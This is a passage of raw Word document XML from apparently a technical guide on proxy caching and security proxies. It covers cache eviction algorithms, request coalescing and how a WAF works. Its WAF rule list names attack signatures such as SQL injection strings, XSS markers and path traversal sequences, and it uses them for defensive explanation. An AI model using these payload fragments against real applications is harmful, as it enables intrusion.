      <w:r w:rsidRPr="003D61F4">
        <w:t>Original response: Last-Modified: Wed, 28 May 2026 10:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9EA98" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cache sends: If-Modified-Since: Wed, 28 May 2026 10:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F09B57D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Origin checks modification time and responds 304 or 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42846862" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes — what this saves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5479F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>A full response might be 500KB (a large JSON payload). A 304 response is ~200 bytes. For frequently-accessed, rarely-changed content, revalidation reduces bandwidth by 99.9%+ while ensuring freshness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB99EAB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Cache Eviction Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08BBFF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When cache storage is full and a new entry needs space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920F01D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LRU (Least Recently Used):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA87781" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Evict the entry accessed longest ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD6A13" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Assumption: recently accessed items will be accessed again soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB4F6C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Implementation: doubly-linked list + hash map. O(1) access and eviction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788280A7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFU (Least Frequently Used):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E7D22" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Evict the entry accessed fewest times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263471D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Better for workloads with stable popularity (hot items stay hot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABDB23" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Problem: new items start with count=1 and get evicted immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0278A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARC (Adaptive Replacement Cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB5537" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Maintains two lists: one for recently accessed (recency), one for frequently accessed (frequency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436101D0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Dynamically adjusts the balance between the two based on workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F5270" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Adapts to both recency-dominated and frequency-dominated access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A96A3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TinyLFU (used by Caffeine cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251C01B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Combines LFU (for admission) with LRU/SLRU (for eviction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543C44A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>A new item is admitted to the cache only if its estimated frequency exceeds the least-frequent current resident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE4E15" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Uses a Count-Min Sketch for space-efficient frequency estimation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C965791" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Near-optimal hit ratios with low overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA2AA6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Cache Hierarchies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132D508" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-level caching in a proxy architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06236CA0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180AEC00" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Client ─→ [Browser Cache] ─→ [CDN Edge Cache] ─→ [Regional Cache/Shield] ─→ [Origin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C867A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">           (L1: private)      (L2: shared)        (L3: shared)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FE54A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inclusive vs. Exclusive hierarchies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C222D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inclusive:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Every item in L1 is also in L2. Eviction from L1 doesn't affect L2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997C71A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exclusive:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Items exist at only ONE level. Miss at L1 → check L2 → if found, promote to L1 and remove from L2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE1778" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache stampede prevention at the proxy level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D975BD1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a popular cached item expires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA3945" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>10,000 simultaneous requests arrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763C577" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>All miss the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B1EF4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>All forward to origin simultaneously → origin overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF3D60" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E25155" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request coalescing (deduplication):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The proxy recognizes multiple concurrent requests for the same resource. Only ONE request goes to origin. The other 9,999 wait. When the origin responds, all waiting requests are served from the fresh cache entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35571254" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lock-based:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> First request acquires a cache-fill lock. Others wait. After fill, all get the cached response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68670272" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stale-while-revalidate:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Serve the stale cached response immediately while ONE background request refreshes. Users get slightly stale data (usually acceptable) without ANY origin load spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5B8C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Nginx implements request coalescing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1DF983" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_cache_lock on directive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA0D46" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>First request for an uncached resource proceeds to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC2BD8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Subsequent requests for the same resource wait (up to proxy_cache_lock_timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748AC925" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>When the first request returns and caches the response, all waiting requests are served from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B537BD1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="7DE86640">
          <v:rect id="_x0000_i3321" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1BFA5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Security Proxy — Protection Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1D1B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Web Application Firewall (WAF) Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25364859" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a WAF proxy works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E823807" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy receives the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC3923" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Passes request through a chain of security rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18D053" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Known attack patterns (SQL injection, XSS payloads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCED79" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol compliance:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Valid HTTP? Headers within size limits? URL not too long?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2F1566" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Is this IP sending suspicious volumes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B54A6BF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behavioral analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Does the traffic pattern match known bot signatures?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298DCC2C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If any rule triggers: block, challenge (CAPTCHA), or log the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE8548" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If clean: forward to backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABF811" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule types (OWASP ModSecurity Core Rule Set example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E588702" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Look for patterns like ' OR 1=1 --, UNION SELECT, etc. in query parameters, POST body, headers, and cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540219B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Patterns like &lt;script&gt;, javascript:, event handlers (onerror=).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485614E5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path traversal:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> ../, ..%2f, attempting to escape document root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C6A03" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote File Inclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> URLs in parameters pointing to external domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BC03E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request smuggling:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Ambiguous Content-Length/Transfer-Encoding combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7AEB7C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The false positive problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8A92B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Legitimate requests can match attack signatures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6ECE81" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>A user submitting a blog post about SQL that contains SELECT * FROM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F51CAD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>A support ticket containing &lt;script&gt; as the user describes a bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A15C1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
